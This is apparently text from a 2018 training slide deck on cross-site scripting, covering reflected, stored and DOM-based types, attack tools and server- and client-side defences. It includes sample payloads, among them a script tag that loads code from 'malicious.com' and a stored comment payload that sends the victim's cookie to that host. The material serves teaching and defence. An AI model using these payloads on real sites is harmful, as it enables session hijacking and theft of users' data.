WARNING – YOU’VE BEEN XSSED! SMARTTALK
Quick facts - 82% of web applications are vulnerable to XSS (2013) , 2/6/2018 APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW Page 2 - 7 out of 10 web applications are vulnerable to XSS (2014) - 60% web applications are vulnerable to XSS (2013) - #3 in OWASP TOP-10 (2013)
Please welcome – XSS! 06.02.2018 / 3 What is XSS XSS – Cross-Site Scripting It is an attack against users of vulnerable webapp Goal Execute code (JavaScript) in victim’s browser in context attacking webapp
How it WORKS??? 06.02.2018 / 4 Link with hidden code Personal Data WWW.SUPERBANK.ORG
XSS Types By attacking vector - Reflected or passive XSS (Type 1) - Stored or active XSS (Type 2) - DOM Based XSS (Type 0) , 2/6/2018 APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW Page 5 By injection channel - Browser errors/bugs - Lack of input validation filtering - Substitution of page encoding
Reflected XSS , 2/6/2018 APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW Page 6 WWW.SUPERBANK.ORG Login ******* Hi Mr. Pibody, Please check our monthly report on our site: http://www.superbank.org/rep_page.aspx?mothly=<script scr=“http://malicious.com/sc.js”></script> www.malicious.com Victim loads JavaScript from site
Stored XSS , 2/6/2018 APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW Page 7 Login ******* WWW.SUPERBANK.ORG www.malicious.com Access to report with employees “comments” Inject active content to report’s “comments” Iteresting report!!!<script>document.write(‘<img src=“http://www.malicious.com/evilsmile.gif?’ + escape(document.cookie) +’”/>’)</script> Victim unknownly sends cookie to www.malicious.com Attacker can now work on behalf victim using session ID from cookie
DOM Based XSS , 2/6/2018 APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW Page 8 Webpages modifies the DOM (Document Object Model) Hard to find <body> <script>document.write(location.href);</script> </body> Simple HTML DOM tree Example of simple vulnerable HTML How to exploit??? http://site.com/test.html#<script>alert(‘xss’);</script> DOM XSS WiKi
How XSS can be used , 2/6/2018 APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW Page 9 Stealing COOKIES - Session HighJacking - Personal data stealing - Unauthorized access to webapp - Reputation loss Stealing forms - Personal data stealing - Unauthorized access to webapp - Reputation loss DDoS-attack - Reputation loss XSS-Worms - Personal data stealing - Unauthorized access to webapp - Reputation loss
Tools , 2/6/2018 APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW Page 10 XENOTIX - OWASP project - Actively developed - Multi-browser tests support - A lots of other features - Freeware XSSF - Metasploit plugin - Console based utility - Web-based GUI present - Creates a communication channel with victim’s browser - Freeware BeEF - Powerful security framework with - Console based utility - Web-based GUI present - Simple and powerful API - Freeware DOMinatorPro - Scanning Automation - Ready Data: Realtime Dynamic Data Tainting - Automatic Exploitability Check - Shareware
How to prevent? , 2/6/2018 APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW Page 11 Server-side protection: Input Validation – do NOT trust anything that comes from users (even Cookies) Use HttpOnly flag Use SSL Do not store confidential data in Cookies Encoding of HTML-symbols, JavaScript, CSS and URLs. Use filtering functions (like filter_sanitize_encoded , htmlentities , filter_sanitize_magic_quotes , etc ) for incoming data filtering Use different libraries for incoming data encoding ( HTML Purifier or Htmlawed , PHP Anti-XSS Class , AntiSamy API , XSS-HTML-Filter ) Client-side protection Use plugins for browsers ( NoScript for FireFox and NotScripts Opera and Chrome)